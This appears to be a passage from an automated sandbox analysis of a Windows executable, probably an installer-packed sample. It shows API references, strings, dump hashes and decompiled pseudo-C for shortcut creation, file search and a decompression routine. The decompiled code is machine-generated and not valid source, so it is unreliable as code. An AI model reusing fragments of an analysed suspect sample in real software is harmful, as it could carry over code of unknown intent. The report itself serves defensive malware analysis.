Part of subcall function 004063D2: CharNextA.USER32(?,"C:\Users\user\Desktop\SYT09009.exe" ,7519FA90,C:\Users\user\AppData\Local\Temp\,00000000,00403323,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040355A,?,00000007,00000009,0000000B), ref: 0040643C
Part of subcall function 004063D2: CharPrevA.USER32(?,?,7519FA90,C:\Users\user\AppData\Local\Temp\,00000000,00403323,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040355A,?,00000007,00000009,0000000B), ref: 0040644C

GetDiskFreeSpaceA.KERNEL32(00429860,?,?,0000040F,?,00429860,00429860,?,00000001,00429860,?,?,000003FB,?), ref: 00404850
MulDiv.KERNEL32(?,0000040F,00000400), ref: 0040486B

Part of subcall function 004049C4: lstrlenA.KERNEL32(0042A890,0042A890,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,004048DF,000000DF,00000000,00000400,?), ref: 00404A62
Part of subcall function 004049C4: wsprintfA.USER32 ref: 00404A6A
Part of subcall function 004049C4: SetDlgItemTextA.USER32 ref: 00404A7D

Strings

C:\Users\user\AppData\Local\Temp, xrefs: 0040475D
A, xrefs: 00404730
KXCJDFJSKF, xrefs: 0040476E, 00404773, 0040477E

Memory Dump Source

Source File: 00000000.00000002.250695784.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.250691921.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.250703820.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.250708634.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.250715810.0000000000415000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.250726496.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.250731472.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.250736343.0000000000438000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.250740572.000000000043A000.00000002.00020000.sdmp Download File

Similarity

API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
String ID: A$C:\Users\user\AppData\Local\Temp$KXCJDFJSKF
API String ID: 2624150263-2259610056
Opcode ID: e2093240277334122aeb027a85fba7e6720a3e9e52d6b68153c58a68e5512187
Instruction ID: 02b07c61478aeb9ac600f99876a590f4236d4304051c708c1213a6c52027fc1c
Opcode Fuzzy Hash: e2093240277334122aeb027a85fba7e6720a3e9e52d6b68153c58a68e5512187
Instruction Fuzzy Hash: CAA16FB1900209ABDB11EFA6DD45AAF77B8EF84314F14843BF601B62D1DB7C89418B69

Uniqueness

Uniqueness Score: -1.00%

Function 0040216B, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 139
comCOMMON

Download Yara Rule

C-Code - Quality: 74%

			E0040216B() {
				signed int _t55;
				void* _t59;
				intOrPtr* _t63;
				intOrPtr _t64;
				intOrPtr* _t65;
				intOrPtr* _t67;
				intOrPtr* _t69;
				intOrPtr* _t71;
				intOrPtr* _t73;
				intOrPtr* _t75;
				intOrPtr* _t78;
				intOrPtr* _t80;
				intOrPtr* _t82;
				intOrPtr* _t84;
				int _t87;
				intOrPtr* _t95;
				signed int _t105;
				signed int _t109;
				void* _t111;

				 *(_t111 - 0x38) = E00402BCE(0xfffffff0);
				 *(_t111 - 0xc) = E00402BCE(0xffffffdf);
				 *((intOrPtr*)(_t111 - 0x88)) = E00402BCE(2);
				 *((intOrPtr*)(_t111 - 0x34)) = E00402BCE(0xffffffcd);
				 *((intOrPtr*)(_t111 - 0x78)) = E00402BCE(0x45);
				_t55 =  *(_t111 - 0x18);
				 *(_t111 - 0x90) = _t55 & 0x00000fff;
				_t105 = _t55 & 0x00008000;
				_t109 = _t55 >> 0x0000000c & 0x00000007;
				 *(_t111 - 0x74) = _t55 >> 0x00000010 & 0x0000ffff;
				if(E00405AFC( *(_t111 - 0xc)) == 0) {
					E00402BCE(0x21);
				}
				_t59 = _t111 + 8;
				__imp__CoCreateInstance(0x408524, _t87, 1, 0x408514, _t59);
				if(_t59 < _t87) {
					L15:
					 *((intOrPtr*)(_t111 - 4)) = 1;
					_push(0xfffffff0);
				} else {
					_t63 =  *((intOrPtr*)(_t111 + 8));
					_t64 =  *((intOrPtr*)( *_t63))(_t63, 0x408534, _t111 - 0x30);
					 *((intOrPtr*)(_t111 - 8)) = _t64;
					if(_t64 >= _t87) {
						_t67 =  *((intOrPtr*)(_t111 + 8));
						 *((intOrPtr*)(_t111 - 8)) =  *((intOrPtr*)( *_t67 + 0x50))(_t67,  *(_t111 - 0xc));
						if(_t105 == _t87) {
							_t84 =  *((intOrPtr*)(_t111 + 8));
							 *((intOrPtr*)( *_t84 + 0x24))(_t84, "C:\\Users\\alfons\\AppData\\Local\\Temp");
						}
						if(_t109 != _t87) {
							_t82 =  *((intOrPtr*)(_t111 + 8));
							 *((intOrPtr*)( *_t82 + 0x3c))(_t82, _t109);
						}
						_t69 =  *((intOrPtr*)(_t111 + 8));
						 *((intOrPtr*)( *_t69 + 0x34))(_t69,  *(_t111 - 0x74));
						_t95 =  *((intOrPtr*)(_t111 - 0x34));
						if( *_t95 != _t87) {
							_t80 =  *((intOrPtr*)(_t111 + 8));
							 *((intOrPtr*)( *_t80 + 0x44))(_t80, _t95,  *(_t111 - 0x90));
						}
						_t71 =  *((intOrPtr*)(_t111 + 8));
						 *((intOrPtr*)( *_t71 + 0x2c))(_t71,  *((intOrPtr*)(_t111 - 0x88)));
						_t73 =  *((intOrPtr*)(_t111 + 8));
						 *((intOrPtr*)( *_t73 + 0x1c))(_t73,  *((intOrPtr*)(_t111 - 0x78)));
						if( *((intOrPtr*)(_t111 - 8)) >= _t87) {
							 *((intOrPtr*)(_t111 - 8)) = 0x80004005;
							if(MultiByteToWideChar(_t87, _t87,  *(_t111 - 0x38), 0xffffffff,  *(_t111 - 0xc), 0x400) != 0) {
								_t78 =  *((intOrPtr*)(_t111 - 0x30));
								 *((intOrPtr*)(_t111 - 8)) =  *((intOrPtr*)( *_t78 + 0x18))(_t78,  *(_t111 - 0xc), 1);
							}
						}
						_t75 =  *((intOrPtr*)(_t111 - 0x30));
						 *((intOrPtr*)( *_t75 + 8))(_t75);
					}
					_t65 =  *((intOrPtr*)(_t111 + 8));
					 *((intOrPtr*)( *_t65 + 8))(_t65);
					if( *((intOrPtr*)(_t111 - 8)) >= _t87) {
						_push(0xfffffff4);
					} else {
						goto L15;
					}
				}
				E00401423();
				 *0x42f4c8 =  *0x42f4c8 +  *((intOrPtr*)(_t111 - 4));
				return 0;
			}

0x00402174
0x0040217e
0x00402188
0x00402195
0x004021a0
0x004021a3
0x004021bd
0x004021c3
0x004021c9
0x004021cc
0x004021d6
0x004021da
0x004021da
0x004021df
0x004021f0
0x004021f8
0x004022d4
0x004022d4
0x004022db
0x004021fe
0x004021fe
0x0040220d
0x00402211
0x00402214
0x0040221a
0x00402228
0x0040222b
0x0040222d
0x00402238
0x00402238
0x0040223d
0x0040223f
0x00402246
0x00402246
0x00402249
0x00402252
0x00402255
0x0040225a
0x0040225c
0x00402269
0x00402269
0x0040226c
0x00402278
0x0040227b
0x00402284
0x0040228a
0x00402291
0x004022aa
0x004022ac
0x004022ba
0x004022ba
0x004022aa
0x004022bd
0x004022c3
0x004022c3
0x004022c6
0x004022cc
0x004022d2
0x004022e7
0x00000000
0x00000000
0x00000000
0x004022d2
0x004022dd
0x00402a5d
0x00402a69

APIs

CoCreateInstance.OLE32(00408524,?,00000001,00408514,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 004021F0
MultiByteToWideChar.KERNEL32(?,?,?,000000FF,?,00000400,?,00000001,00408514,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 004022A2

Strings

C:\Users\user\AppData\Local\Temp, xrefs: 00402230

Memory Dump Source

Source File: 00000000.00000002.250695784.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.250691921.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.250703820.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.250708634.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.250715810.0000000000415000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.250726496.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.250731472.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.250736343.0000000000438000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.250740572.000000000043A000.00000002.00020000.sdmp Download File

Similarity

API ID: ByteCharCreateInstanceMultiWide
String ID: C:\Users\user\AppData\Local\Temp
API String ID: 123533781-1943935188
Opcode ID: 3c5799551ecf467b98758a7772b9f68a95bcaf766b99ab5d6102861f06629b87
Instruction ID: cfd0f9f97044ed47efa98841b374527745dcc5d1cf4597a5ef188e8ddd78f045
Opcode Fuzzy Hash: 3c5799551ecf467b98758a7772b9f68a95bcaf766b99ab5d6102861f06629b87
Instruction Fuzzy Hash: DF510671A00208AFCB50DFE4C989E9D7BB6FF48314F2041AAF515EB2D1DA799981CB54

Uniqueness

Uniqueness Score: -1.00%

Function 004027A1, Relevance: 1.5, APIs: 1, Instructions: 29
fileCOMMON

Download Yara Rule

C-Code - Quality: 39%

			E004027A1(char __ebx, char* __edi, char* __esi) {
				void* _t19;

				if(FindFirstFileA(E00402BCE(2), _t19 - 0x1d0) != 0xffffffff) {
					E00406055(__edi, _t6);
					_push(_t19 - 0x1a4);
					_push(__esi);
					E004060F7();
				} else {
					 *__edi = __ebx;
					 *__esi = __ebx;
					 *((intOrPtr*)(_t19 - 4)) = 1;
				}
				 *0x42f4c8 =  *0x42f4c8 +  *((intOrPtr*)(_t19 - 4));
				return 0;
			}

0x004027b9
0x004027cd
0x004027d8
0x004027d9
0x00402918
0x004027bb
0x004027bb
0x004027bd
0x004027bf
0x004027bf
0x00402a5d
0x00402a69

APIs

FindFirstFileA.KERNEL32(00000000,?,00000002), ref: 004027B0

Memory Dump Source

Source File: 00000000.00000002.250695784.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.250691921.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.250703820.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.250708634.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.250715810.0000000000415000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.250726496.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.250731472.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.250736343.0000000000438000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.250740572.000000000043A000.00000002.00020000.sdmp Download File

Similarity

API ID: FileFindFirst
String ID:
API String ID: 1974802433-0
Opcode ID: 4423a52aeb003c350b17b55cd02f29573d1ce5b782dbbfafeefecc88e991a537
Instruction ID: cbd12963852304709d998dbd60bf7e8f33587a64a337c4fd13578998f516bfb3
Opcode Fuzzy Hash: 4423a52aeb003c350b17b55cd02f29573d1ce5b782dbbfafeefecc88e991a537
Instruction Fuzzy Hash: 3EF0A072604110DED711EBA49A49AFEB768AF61314F60457FF112B20C1D7B889469B3A

Uniqueness

Uniqueness Score: -1.00%

Function 00406945, Relevance: .3, Instructions: 334
COMMONCrypto

Download Yara Rule

C-Code - Quality: 79%

			E00406945(signed int __ebx, signed int* __esi) {
				signed int _t396;
				signed int _t425;
				signed int _t442;
				signed int _t443;
				signed int* _t446;
				void* _t448;

				L0:
				while(1) {
					L0:
					_t446 = __esi;
					_t425 = __ebx;
					if( *(_t448 - 0x34) == 0) {
						break;
					}
					L55:
					__eax =  *(__ebp - 0x38);
					 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
					__ecx = __ebx;
					 *( *(__ebp - 0x38)) & 0x000000ff = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
					 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
					 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
					__ebx = __ebx + 8;
					while(1) {
						L56:
						if(__ebx < 0xe) {
							goto L0;
						}
						L57:
						__eax =  *(__ebp - 0x40);
						__eax =  *(__ebp - 0x40) & 0x00003fff;
						__ecx = __eax;
						__esi[1] = __eax;
						__ecx = __eax & 0x0000001f;
						if(__cl > 0x1d) {
							L9:
							_t443 = _t442 | 0xffffffff;
							 *_t446 = 0x11;
							L10:
							_t446[0x147] =  *(_t448 - 0x40);
							_t446[0x146] = _t425;
							( *(_t448 + 8))[1] =  *(_t448 - 0x34);
							L11:
							 *( *(_t448 + 8)) =  *(_t448 - 0x38);
							_t446[0x26ea] =  *(_t448 - 0x30);
							E004070B4( *(_t448 + 8));
							return _t443;
						}
						L58:
						__eax = __eax & 0x000003e0;
						if(__eax > 0x3a0) {
							goto L9;
						}
						L59:
						 *(__ebp - 0x40) =  *(__ebp - 0x40) >> 0xe;
						__ebx = __ebx - 0xe;
						_t94 =  &(__esi[2]);
						 *_t94 = __esi[2] & 0x00000000;
						 *__esi = 0xc;
						while(1) {
							L60:
							__esi[1] = __esi[1] >> 0xa;
							__eax = (__esi[1] >> 0xa) + 4;
							if(__esi[2] >= (__esi[1] >> 0xa) + 4) {
								goto L68;
							}
							L61:
							while(1) {
								L64:
								if(__ebx >= 3) {
									break;
								}
								L62:
								if( *(__ebp - 0x34) == 0) {
									goto L182;
								}
								L63:
								__eax =  *(__ebp - 0x38);
								 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
								__ecx = __ebx;
								 *( *(__ebp - 0x38)) & 0x000000ff = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
								 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
								 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
								__ebx = __ebx + 8;
							}
							L65:
							__ecx = __esi[2];
							 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000007;
							__ebx = __ebx - 3;
							_t108 = __ecx + 0x408408; // 0x121110
							__ecx =  *_t108;
							 *(__ebp - 0x40) =  *(__ebp - 0x40) >> 3;
							 *(__esi + 0xc +  *_t108 * 4) =  *(__ebp - 0x40) & 0x00000007;
							__ecx = __esi[1];
							__esi[2] = __esi[2] + 1;
							__eax = __esi[2];
							__esi[1] >> 0xa = (__esi[1] >> 0xa) + 4;
							if(__esi[2] < (__esi[1] >> 0xa) + 4) {
								goto L64;
							}
							L66:
							while(1) {
								L68:
								if(__esi[2] >= 0x13) {
									break;
								}
								L67:
								_t119 = __esi[2] + 0x408408; // 0x4000300
								__eax =  *_t119;
								 *(__esi + 0xc +  *_t119 * 4) =  *(__esi + 0xc +  *_t119 * 4) & 0x00000000;
								_t126 =  &(__esi[2]);
								 *_t126 = __esi[2] + 1;
							}
							L69:
							__ecx = __ebp - 8;
							__edi =  &(__esi[0x143]);
							 &(__esi[0x148]) =  &(__esi[0x144]);
							__eax = 0;
							 *(__ebp - 8) = 0;
							__eax =  &(__esi[3]);
							 *__edi = 7;
							__eax = E0040711C( &(__esi[3]), 0x13, 0x13, 0, 0,  &(__esi[0x144]), __edi,  &(__esi[0x148]), __ebp - 8);
							if(__eax != 0) {
								L72:
								 *__esi = 0x11;
								while(1) {
									L180:
									_t396 =  *_t446;
									if(_t396 > 0xf) {
										break;
									}
									L1:
									switch( *((intOrPtr*)(_t396 * 4 +  &M00407074))) {
										case 0:
											L101:
											__eax = __esi[4] & 0x000000ff;
											__esi[3] = __esi[4] & 0x000000ff;
											__eax = __esi[5];
											__esi[2] = __esi[5];
											 *__esi = 1;
											goto L102;
										case 1:
											L102:
											__eax = __esi[3];
											while(1) {
												L105:
												__eflags = __ebx - __eax;
												if(__ebx >= __eax) {
													break;
												}
												L103:
												__eflags =  *(__ebp - 0x34);
												if( *(__ebp - 0x34) == 0) {
													goto L182;
												}
												L104:
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
												__ecx = __ebx;
												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
												__ebx = __ebx + 8;
												__eflags = __ebx;
											}
											L106:
											__eax =  *(0x40a408 + __eax * 2) & 0x0000ffff;
											__eax = __eax &  *(__ebp - 0x40);
											__ecx = __esi[2];
											__eax = __esi[2] + __eax * 4;
											__ecx =  *(__eax + 1) & 0x000000ff;
											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
											__ebx = __ebx - ( *(__eax + 1) & 0x000000ff);
											__ecx =  *__eax & 0x000000ff;
											__eflags = __ecx;
											if(__ecx != 0) {
												L108:
												__eflags = __cl & 0x00000010;
												if((__cl & 0x00000010) == 0) {
													L110:
													__eflags = __cl & 0x00000040;
													if((__cl & 0x00000040) == 0) {
														goto L125;
													}
													L111:
													__eflags = __cl & 0x00000020;
													if((__cl & 0x00000020) == 0) {
														goto L9;
													}
													L112:
													 *__esi = 7;
													goto L180;
												}
												L109:
												__esi[2] = __ecx;
												__esi[1] = __eax;
												 *__esi = 2;
												goto L180;
											}
											L107:
											__esi[2] = __eax;
											 *__esi = 6;
											goto L180;
										case 2:
											L113:
											__eax = __esi[2];
											while(1) {
												L116:
												__eflags = __ebx - __eax;
												if(__ebx >= __eax) {
													break;
												}
												L114:
												__eflags =  *(__ebp - 0x34);
												if( *(__ebp - 0x34) == 0) {
													goto L182;
												}
												L115:
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
												__ecx = __ebx;
												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
												__ebx = __ebx + 8;
												__eflags = __ebx;
											}
											L117:
											 *(0x40a408 + __eax * 2) & 0x0000ffff =  *(0x40a408 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40);
											__esi[1] = __esi[1] + ( *(0x40a408 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40));
											__ecx = __eax;
											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
											__ebx = __ebx - __eax;
											__eflags = __ebx;
											__eax = __esi[4] & 0x000000ff;
											__esi[3] = __esi[4] & 0x000000ff;
											__eax = __esi[6];
											__esi[2] = __esi[6];
											 *__esi = 3;
											goto L118;
										case 3:
											L118:
											__eax = __esi[3];
											while(1) {
												L121:
												__eflags = __ebx - __eax;
												if(__ebx >= __eax) {
													break;
												}
												L119:
												__eflags =  *(__ebp - 0x34);
												if( *(__ebp - 0x34) == 0) {
													goto L182;
												}
												L120:
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
												__ecx = __ebx;
												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
												__ebx = __ebx + 8;
												__eflags = __ebx;
											}
											L122:
											__eax =  *(0x40a408 + __eax * 2) & 0x0000ffff;
											__eax = __eax &  *(__ebp - 0x40);
											__ecx = __esi[2];
											__eax = __esi[2] + __eax * 4;
											__ecx =  *(__eax + 1) & 0x000000ff;
											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
											__ebx = __ebx - ( *(__eax + 1) & 0x000000ff);
											__ecx =  *__eax & 0x000000ff;
											__eflags = __cl & 0x00000010;
											if((__cl & 0x00000010) == 0) {
												L124:
												__eflags = __cl & 0x00000040;
												if((__cl & 0x00000040) != 0) {
													goto L9;
												}
												L125:
												__esi[3] = __ecx;
												__ecx =  *(__eax + 2) & 0x0000ffff;
												__esi[2] = __eax;
												goto L180;
											}
											L123:
											__esi[2] = __ecx;
											__esi[3] = __eax;
											 *__esi = 4;
											goto L180;
										case 4:
											L126:
											__eax = __esi[2];
											while(1) {
												L129:
												__eflags = __ebx - __eax;
												if(__ebx >= __eax) {
													break;
												}
												L127:
												__eflags =  *(__ebp - 0x34);
												if( *(__ebp - 0x34) == 0) {
													goto L182;
												}
												L128:
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
												__ecx = __ebx;
												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
												__ebx = __ebx + 8;
												__eflags = __ebx;
											}
											L130:
											 *(0x40a408 + __eax * 2) & 0x0000ffff =  *(0x40a408 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40);
											__esi[3] = __esi[3] + ( *(0x40a408 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40));
											__ecx = __eax;
											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
											__ebx = __ebx - __eax;
											__eflags = __ebx;
											 *__esi = 5;
											goto L131;
										case 5:
											L131:
											__eax =  *(__ebp - 0x30);
											__edx = __esi[3];
											__eax = __eax - __esi;
											__ecx = __eax - __esi - 0x1ba0;
											__eflags = __eax - __esi - 0x1ba0 - __edx;
											if(__eax - __esi - 0x1ba0 >= __edx) {
												__ecx = __eax;
												__ecx = __eax - __edx;
												__eflags = __ecx;
											} else {
												__esi[0x26e8] = __esi[0x26e8] - __edx;
												__ecx = __esi[0x26e8] - __edx - __esi;
												__ecx = __esi[0x26e8] - __edx - __esi + __eax - 0x1ba0;
											}
											__eflags = __esi[1];
											 *(__ebp - 0x20) = __ecx;
											if(__esi[1] != 0) {
												L135:
												__edi =  *(__ebp - 0x2c);
												do {
													L136:
													__eflags = __edi;
													if(__edi != 0) {
														goto L152;
													}
													L137:
													__edi = __esi[0x26e8];
													__eflags = __eax - __edi;
													if(__eax != __edi) {
														L143:
														__esi[0x26ea] = __eax;
														__eax = E004070B4( *((intOrPtr*)(__ebp + 8)));
														__eax = __esi[0x26ea];
														__ecx = __esi[0x26e9];
														__eflags = __eax - __ecx;
														 *(__ebp - 0x30) = __eax;
														if(__eax >= __ecx) {
															__edi = __esi[0x26e8];
															__edi = __esi[0x26e8] - __eax;
															__eflags = __edi;
														} else {
															__ecx = __ecx - __eax;
															__edi = __ecx - __eax - 1;
														}
														__edx = __esi[0x26e8];
														__eflags = __eax - __edx;
														 *(__ebp - 8) = __edx;
														if(__eax == __edx) {
															__edx =  &(__esi[0x6e8]);
															__eflags = __ecx - __edx;
															if(__ecx != __edx) {
																__eax = __edx;
																__eflags = __eax - __ecx;
																 *(__ebp - 0x30) = __eax;
																if(__eax >= __ecx) {
																	__edi =  *(__ebp - 8);
																	__edi =  *(__ebp - 8) - __eax;
																	__eflags = __edi;
																} else {
																	__ecx = __ecx - __eax;
																	__edi = __ecx;
																}
															}
														}
														__eflags = __edi;
														if(__edi == 0) {
															goto L183;
														} else {
															goto L152;
														}
													}
													L138:
													__ecx = __esi[0x26e9];
													__edx =  &(__esi[0x6e8]);
													__eflags = __ecx - __edx;
													if(__ecx == __edx) {
														goto L143;
													}
													L139:
													__eax = __edx;
													__eflags = __eax - __ecx;
													if(__eax >= __ecx) {
														__edi = __edi - __eax;
														__eflags = __edi;
													} else {
														__ecx = __ecx - __eax;
														__edi = __ecx;
													}
													__eflags = __edi;
													if(__edi == 0) {
														goto L143;
													}
													L152:
													__ecx =  *(__ebp - 0x20);
													 *__eax =  *__ecx;
													__eax = __eax + 1;
													__ecx = __ecx + 1;
													__edi = __edi - 1;
													__eflags = __ecx - __esi[0x26e8];
													 *(__ebp - 0x30) = __eax;
													 *(__ebp - 0x20) = __ecx;
													 *(__ebp - 0x2c) = __edi;
													if(__ecx == __esi[0x26e8]) {
														__ecx =  &(__esi[0x6e8]);
														 *(__ebp - 0x20) =  &(__esi[0x6e8]);
													}
													_t357 =  &(__esi[1]);
													 *_t357 = __esi[1] - 1;
													__eflags =  *_t357;
												} while ( *_t357 != 0);
											}
											goto L23;
										case 6:
											L156:
											__eax =  *(__ebp - 0x2c);
											__edi =  *(__ebp - 0x30);
											__eflags = __eax;
											if(__eax != 0) {
												L172:
												__cl = __esi[2];
												 *__edi = __cl;
												__edi = __edi + 1;
												__eax = __eax - 1;
												 *(__ebp - 0x30) = __edi;
												 *(__ebp - 0x2c) = __eax;
												goto L23;
											}
											L157:
											__ecx = __esi[0x26e8];
											__eflags = __edi - __ecx;
											if(__edi != __ecx) {
												L163:
												__esi[0x26ea] = __edi;
												__eax = E004070B4( *((intOrPtr*)(__ebp + 8)));
												__edi = __esi[0x26ea];
												__ecx = __esi[0x26e9];
												__eflags = __edi - __ecx;
												 *(__ebp - 0x30) = __edi;
												if(__edi >= __ecx) {
													__eax = __esi[0x26e8];
													__eax = __esi[0x26e8] - __edi;
													__eflags = __eax;
												} else {
													__ecx = __ecx - __edi;
													__eax = __ecx - __edi - 1;
												}
												__edx = __esi[0x26e8];
												__eflags = __edi - __edx;
												 *(__ebp - 8) = __edx;
												if(__edi == __edx) {
													__edx =  &(__esi[0x6e8]);
													__eflags = __ecx - __edx;
													if(__ecx != __edx) {
														__edi = __edx;
														__eflags = __edi - __ecx;
														 *(__ebp - 0x30) = __edi;
														if(__edi >= __ecx) {
															__eax =  *(__ebp - 8);
															__eax =  *(__ebp - 8) - __edi;
															__eflags = __eax;
														} else {
															__ecx = __ecx - __edi;
															__eax = __ecx;
														}
													}
												}
												__eflags = __eax;
												if(__eax == 0) {
													goto L183;
												} else {
													goto L172;
												}
											}
											L158:
											__eax = __esi[0x26e9];
											__edx =  &(__esi[0x6e8]);
											__eflags = __eax - __edx;
											if(__eax == __edx) {
												goto L163;
											}
											L159:
											__edi = __edx;
											__eflags = __edi - __eax;
											if(__edi >= __eax) {
												__ecx = __ecx - __edi;
												__eflags = __ecx;
												__eax = __ecx;
											} else {
												__eax = __eax - __edi;
												__eax = __eax - 1;
											}
											__eflags = __eax;
											if(__eax != 0) {
												goto L172;
											} else {
												goto L163;
											}
										case 7:
											L173:
											__eflags = __ebx - 7;
											if(__ebx > 7) {
												__ebx = __ebx - 8;
												 *(__ebp - 0x34) =  *(__ebp - 0x34) + 1;
												_t380 = __ebp - 0x38;
												 *_t380 =  *(__ebp - 0x38) - 1;
												__eflags =  *_t380;
											}
											goto L175;
										case 8:
											L4:
											while(_t425 < 3) {
												if( *(_t448 - 0x34) == 0) {
													goto L182;
												} else {
													 *(_t448 - 0x34) =  *(_t448 - 0x34) - 1;
													 *(_t448 - 0x40) =  *(_t448 - 0x40) | ( *( *(_t448 - 0x38)) & 0x000000ff) << _t425;
													 *(_t448 - 0x38) =  &(( *(_t448 - 0x38))[1]);
													_t425 = _t425 + 8;
													continue;
												}
											}
											_t425 = _t425 - 3;
											 *(_t448 - 0x40) =  *(_t448 - 0x40) >> 3;
											_t406 =  *(_t448 - 0x40) & 0x00000007;
											asm("sbb ecx, ecx");
											_t408 = _t406 >> 1;
											_t446[0x145] = ( ~(_t406 & 0x00000001) & 0x00000007) + 8;
											if(_t408 == 0) {
												L24:
												 *_t446 = 9;
												_t436 = _t425 & 0x00000007;
												 *(_t448 - 0x40) =  *(_t448 - 0x40) >> _t436;
												_t425 = _t425 - _t436;
												goto L180;
											}
											L6:
											_t411 = _t408 - 1;
											if(_t411 == 0) {
												L13:
												__eflags =  *0x42e3a8;
												if( *0x42e3a8 != 0) {
													L22:
													_t412 =  *0x40a42c; // 0x9
													_t446[4] = _t412;
													_t413 =  *0x40a430; // 0x5
													_t446[4] = _t413;
													_t414 =  *0x42d224; // 0x0
													_t446[5] = _t414;
													_t415 =  *0x42d220; // 0x0
													_t446[6] = _t415;
													L23:
													 *_t446 =  *_t446 & 0x00000000;
													goto L180;
												} else {
													_t26 = _t448 - 8;
													 *_t26 =  *(_t448 - 8) & 0x00000000;
													__eflags =  *_t26;
													_t416 = 0x42d228;
													goto L15;
													L20:
													 *_t416 = _t438;
													_t416 = _t416 + 4;
													__eflags = _t416 - 0x42d6a8;
													if(_t416 < 0x42d6a8) {
														L15:
														__eflags = _t416 - 0x42d464;
														_t438 = 8;
														if(_t416 > 0x42d464) {
															__eflags = _t416 - 0x42d628;
															if(_t416 >= 0x42d628) {
																__eflags = _t416 - 0x42d688;
																if(_t416 < 0x42d688) {
																	_t438 = 7;
																}
															} else {
																_t438 = 9;
															}
														}
														goto L20;
													} else {
														E0040711C(0x42d228, 0x120, 0x101, 0x40841c, 0x40845c, 0x42d224, 0x40a42c, 0x42db28, _t448 - 8);
														_push(0x1e);
														_pop(_t440);
														_push(5);
														_pop(_t419);
														memset(0x42d228, _t419, _t440 << 2);
														_t450 = _t450 + 0xc;
														_t442 = 0x42d228 + _t440;
														E0040711C(0x42d228, 0x1e, 0, 0x40849c, 0x4084d8, 0x42d220, 0x40a430, 0x42db28, _t448 - 8);
														 *0x42e3a8 =  *0x42e3a8 + 1;
														__eflags =  *0x42e3a8;
														goto L22;
													}
